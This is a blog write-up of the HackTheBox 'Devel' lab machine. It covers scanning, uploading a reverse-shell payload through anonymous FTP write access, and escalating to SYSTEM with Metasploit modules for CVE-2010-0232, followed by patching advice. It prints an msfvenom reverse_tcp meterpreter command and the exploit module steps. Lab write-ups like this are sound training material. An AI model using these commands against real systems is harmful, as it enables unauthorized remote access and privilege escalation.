Skip to main content
  1. writeup-ctf/

Writeup - Devel (HTB)

·293 words·2 mins·
Cybersecurity, Devops, Infrastructure
Table of Contents

This is a writeup for the Devel machine from the HackTheBox site.


First, let’s start with a scan of our target with the following command:

nmap -sV -T4 -Pn

Two TCP ports are discovered:

  • 21/tcp : FTP (ftpd)
  • 80/tcp : HTTP web server (Apache 2.4.41)


I start by seeing if it is possible to connect to FTP as anonymous:

In addition to being able to read, we have the ability to write, so I create a payload to make a reverse shell with the following command:

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=1234 -f aspx -o shell.aspx

I upload it then with the help of Metasploit I launch a TCP handler to create a meterpreter.

I then access my previously uploaded payload at the following address:

I now have a reverse shell on the machine.

Privilege escalation

I pause the meterpreter with CRTL+Z. Then to try to determine some feats, I use the following module on Metasploit.

use post/multi/recon/local_exploit_suggester
set SESSION 19

The module has found a number of potential exploits.

I start by testing the first one:

use windows/local/bypassuac_eventtvwr
set SESSION 19

But without success. I test the second one:

use windows/local/ms10_015_kitrap0d
set SESSION 19

This one worked, I now have a reverse shell with the NT AUTHORITY\SYSTEM authorization.

The module MS10_015 is linked to CVE-2010-0232.

[…] when access to 16-bit applications is enabled on a 32-bit x86 platform, does not properly validate certain BIOS calls, which allows local users to gain privileges […] VK9 Security

I can now get both flags back.


To patch this host I think it would be necessary to perform a number of actions:

  • Disable writing to the FTP server as anonymous
  • Update Windows to patch CVE-2010-0232


Writeup - Paper (HTB)
·782 words·4 mins
Writeup - RouterSpace (HTB)
·588 words·3 mins
Writeup - Secret (HTB)
·1080 words·6 mins